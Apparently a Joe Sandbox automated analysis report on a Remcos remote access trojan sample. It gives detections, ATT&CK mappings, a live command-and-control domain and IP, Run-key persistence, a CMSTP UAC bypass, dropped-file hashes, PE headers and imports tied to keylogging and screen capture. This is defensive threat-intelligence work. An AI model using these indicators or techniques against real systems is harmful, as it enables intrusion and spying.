                      Source: Yara matchFile source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: cmd.exe0_2_0040569A
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: cmd.exe3_2_0040569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts12
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol211
                      Input Capture                      		2
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution                      		11
                      Registry Run Keys / Startup Folder                      		1
                      Access Token Manipulation                      		1
                      DLL Side-Loading                      		2
                      Credentials In Files                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Windows Service                      		1
                      Bypass User Account Control                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture1
                      Remote Access Software                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script22
                      Process Injection                      		1
                      Masquerading                      		LSA Secrets22
                      System Information Discovery                      		SSHKeylogging1
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                      Registry Run Keys / Startup Folder                      		1
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials121
                      Security Software Discovery                      		VNCGUI Input Capture21
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Access Token Manipulation                      		DCSync1
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Process Injection                      		Proc Filesystem2
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      1m70ggeepT.exe79%VirustotalBrowse
                      1m70ggeepT.exe100%AviraBDS/Backdoor.Gen
                      1m70ggeepT.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\microsofts\svcs.exe100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Roaming\microsofts\svcs.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\microsofts\svcs.exe79%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      leetboy.dynuddns.net9%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://geoplugin.net/json.gp100%URL Reputationphishing
                      http://geoplugin.net/json.gp100%URL Reputationphishing
                      http://geoplugin.net/json.gp/C100%URL Reputationphishing
                      leetboy.dynuddns.net100%Avira URL Cloudphishing
                      leetboy.dynuddns.net9%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      leetboy.dynuddns.net
                      		185.196.11.223
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      leetboy.dynuddns.nettrue
                      • 9%, Virustotal, Browse
                      • Avira URL Cloud: phishing
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gp1m70ggeepT.exe, svcs.exetrue
                      • URL Reputation: phishing
                      • URL Reputation: phishing
                      		unknown
                      http://geoplugin.net/json.gp/C1m70ggeepT.exe, svcs.exe.0.drtrue
                      • URL Reputation: phishing
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.196.11.223
                      		leetboy.dynuddns.netSwitzerland
                      		42624SIMPLECARRIERCHtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1417365
                      Start date and time:2024-03-29 05:12:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 1s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:1m70ggeepT.exe
                      renamed because original name is a hash value
                      Original Sample Name:06f5b8dffc6c138828adbc7f29cfc7f0.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@6/3@2/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 22
                      • Number of non-executed functions: 394
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target svcs.exe, PID 5528 because there are no executed function
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      05:12:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0 "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      05:13:02AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0 "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      05:13:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0 "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      05:13:26API Interceptor8101212x Sleep call for process: svcs.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.196.11.223file.exeGet hashmaliciousAsyncRATBrowse
                        Sldl84wxy8.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                          V1yLpoS3XR.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                            rU6YAgkoAw.exeGet hashmaliciousAsyncRATBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              leetboy.dynuddns.netfile.exeGet hashmaliciousAsyncRATBrowse
                              • 185.196.11.223
                              Sldl84wxy8.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                              • 185.196.11.223
                              V1yLpoS3XR.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                              • 185.196.11.223
                              rU6YAgkoAw.exeGet hashmaliciousAsyncRATBrowse
                              • 185.196.11.223

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SIMPLECARRIERCHfile.exeGet hashmaliciousAsyncRATBrowse
                              • 185.196.11.223
                              Sldl84wxy8.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                              • 185.196.11.223
                              V1yLpoS3XR.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                              • 185.196.11.223
                              rU6YAgkoAw.exeGet hashmaliciousAsyncRATBrowse
                              • 185.196.11.223
                              9NBx4Vmiuj.exeGet hashmaliciousPureLog Stealer, XWorm, zgRATBrowse
                              • 185.196.10.233
                              UNca1snvkz.elfGet hashmaliciousMiraiBrowse
                              • 185.196.10.155
                              bd7kzboTUq.elfGet hashmaliciousMiraiBrowse
                              • 185.196.10.155
                              H6ZdQFux3W.elfGet hashmaliciousMiraiBrowse
                              • 185.196.10.155
                              jxJoK9xswU.elfGet hashmaliciousMiraiBrowse
                              • 185.196.10.155
                              29oAGfUZCW.elfGet hashmaliciousMiraiBrowse
                              • 185.196.10.155

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\logsa\logs.dat

                              Download File
                              Process:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):360
                              Entropy (8bit):7.383946551870991
                              Encrypted:false
                              SSDEEP:6:nMsZwnfQSvGc6Zyk89M8dxQnM/OITxUfwkMFKrzmqSczxPRTAl6sWEsWmssHbB1:n8nfBvY8N/OsSaRqSsUl1HsWmsKbj
                              MD5:2FAEFCC4A1C386689501A2829C110507
                              SHA1:A88B488694D5C870343F32DB7DA36A56FAE45E8D
                              SHA-256:CDAAE9CB4F9A05F0480DED928586F1A08C5CE2776D79BE23491F91B80254A78D
                              SHA-512:6C79BFA733EAF889231B0498819A20D17F721BB70CC6E77758DFB7AB73A5F63989ECC5EE263CF8EADE1786845FD69CC8C1236401A5B55B7D7A6672E5CDBFC08A
                              Malicious:false
                              Reputation:low
                              Preview:.Yu..#.|......4...).....O....&^E......m..n..GW..Ua.....i.76..#.c..4.-.......C(dv.y..z. .Y4.T....9...+..T-.n..M....Zk.lY..)..2C..b.....V..Sg......r..nrt.l..j.#.[......w...3...5.........(..2..3..C...&l...4==~I....E....`.j.b+;..k..Ft6...<e`..(u...........A.r.$...}...t....X...0_..%.c.el...L^...y..W....7..A.b"a...J.# ...{W...!.Z_+...Q.....k..k.t.'.

                              C:\Users\user\AppData\Roaming\microsofts\svcs.exe

                              Download File
                              Process:C:\Users\user\Desktop\1m70ggeepT.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):494592
                              Entropy (8bit):6.599795686012734
                              Encrypted:false
                              SSDEEP:6144:aXIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZDAXYcNx5Gv:aX7tPMK8ctGe4Dzl4h2QnuPs/ZDIcv
                              MD5:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              SHA1:B59EF5D613A1E49C7034C3EE05780CE054CA0054
                              SHA-256:03BA551339062106448FF58CBC393338483439513EC8439497BF47153E13F4B7
                              SHA-512:E706A0B3B1981CAC8DDCF81482B306B4538FBFBF5C332F2B484F8C503B66D73CD09FFAAB0515ECB2063D1E4A27DC30A662CC0BE4F5287D2982CFBB47C7DAD893
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Virustotal, Detection: 79%, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~...R..~...r..~...j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..~................PE..L...[1.e.................r...........I............@.......................... ..........................................................TK.......................;..@...8...........................x...@............................................text...uq.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc...TK.......L..................@..@.reloc...;.......<...P..............@..B........................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\microsofts\svcs.exe:Zone.Identifier

                              Download File
                              Process:C:\Users\user\Desktop\1m70ggeepT.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:[ZoneTransfer]....ZoneId=0

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.599795686012734
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:1m70ggeepT.exe
                              File size:494'592 bytes
                              MD5:06f5b8dffc6c138828adbc7f29cfc7f0
                              SHA1:b59ef5d613a1e49c7034c3ee05780ce054ca0054
                              SHA256:03ba551339062106448ff58cbc393338483439513ec8439497bf47153e13f4b7
                              SHA512:e706a0b3b1981cac8ddcf81482b306b4538fbfbf5c332f2b484f8c503b66d73cd09ffaab0515ecb2063d1e4a27dc30a662cc0be4f5287d2982cfbb47c7dad893
                              SSDEEP:6144:aXIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZDAXYcNx5Gv:aX7tPMK8ctGe4Dzl4h2QnuPs/ZDIcv
                              TLSH:B4B49E01BAD1C072D57524300D3AF776EAB8BD2028364A7B73D61D5BFE31190B62A6B7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~....R..~....r..~....j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..

                              File Icon

                              Icon Hash:95694d05214c1b33

                              Static PE Info

                              General

                              Entrypoint:0x4349ef
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x65EC315B [Sat Mar 9 09:52:27 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:8d5087ff5de35c3fbb9f212b47d63cad

                              Entrypoint Preview

                              Instruction
                              call 00007FED18F6E4CCh
                              jmp 00007FED18F6DEE3h
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push ebx
                              push esi
                              push 00000017h
                              call 00007FED18F90744h
                              test eax, eax
                              je 00007FED18F6E057h
                              mov ecx, dword ptr [ebp+08h]
                              int 29h
                              xor esi, esi
                              lea eax, dword ptr [ebp-00000324h]
                              push 000002CCh
                              push esi
                              push eax
                              mov dword ptr [00471D14h], esi
                              call 00007FED18F704B7h
                              add esp, 0Ch
                              mov dword ptr [ebp-00000274h], eax
                              mov dword ptr [ebp-00000278h], ecx
                              mov dword ptr [ebp-0000027Ch], edx
                              mov dword ptr [ebp-00000280h], ebx
                              mov dword ptr [ebp-00000284h], esi
                              mov dword ptr [ebp-00000288h], edi
                              mov word ptr [ebp-0000025Ch], ss
                              mov word ptr [ebp-00000268h], cs
                              mov word ptr [ebp-0000028Ch], ds
                              mov word ptr [ebp-00000290h], es
                              mov word ptr [ebp-00000294h], fs
                              mov word ptr [ebp-00000298h], gs
                              pushfd
                              pop dword ptr [ebp-00000264h]
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-0000026Ch], eax
                              lea eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-00000260h], eax
                              mov dword ptr [ebp-00000324h], 00010001h
                              mov eax, dword ptr [eax-04h]
                              push 00000050h
                              mov dword ptr [ebp-00000270h], eax
                              lea eax, dword ptr [ebp-58h]
                              push esi
                              push eax
                              call 00007FED18F7042Eh

                              Rich Headers

                              Programming Language:
                              • [C++] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6eea80x104.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x4b54.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bcc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3400x38.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x6d3d40x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3780x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x590000x4fc.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x571750x57200f959ed65f49a903603bc150bbb7292aaFalse0.571329694225251data6.62552167894442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x590000x179b60x17a00dd9ac1735f016f0a84955e5637da2aadFalse0.5005580357142857Zebra Metafile graphic (comment = \210\002\007)5.859387089901195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x710000x5d440xe00fa1a169b9414830def88848af87110b5False0.22154017857142858data3.00580031855032IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .gfids0x780000x2300x40009e4699aa75951ab53e804fe4f9a3b6bFalse0.3271484375data2.349075166240886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x790000x4b540x4c002245fdef09972c13416f5a296b1f1cf4False0.2842824835526316data3.9927030586078716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x7e0000x3bcc0x3c000a6e61b09628beca43d4bf9604f65238False0.7639973958333334data6.718533933603825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                              RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                              RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                              RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                              RT_RCDATA0x7d5cc0x546data1.0081481481481482
                              RT_GROUP_ICON0x7db140x3edataEnglishUnited States0.8064516129032258

                              Imports

                              DLLImport
                              KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                              USER32.dllGetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, GetMessageA, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, DispatchMessageA, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, GetIconInfo, GetSystemMetrics, AppendMenuA, RegisterClassExA, GetCursorPos, SetForegroundWindow, DrawIcon, SystemParametersInfoW
                              GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                              ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                              SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                              ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                              SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                              WINMM.dllwaveInUnprepareHeader, waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader
                              WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                              urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
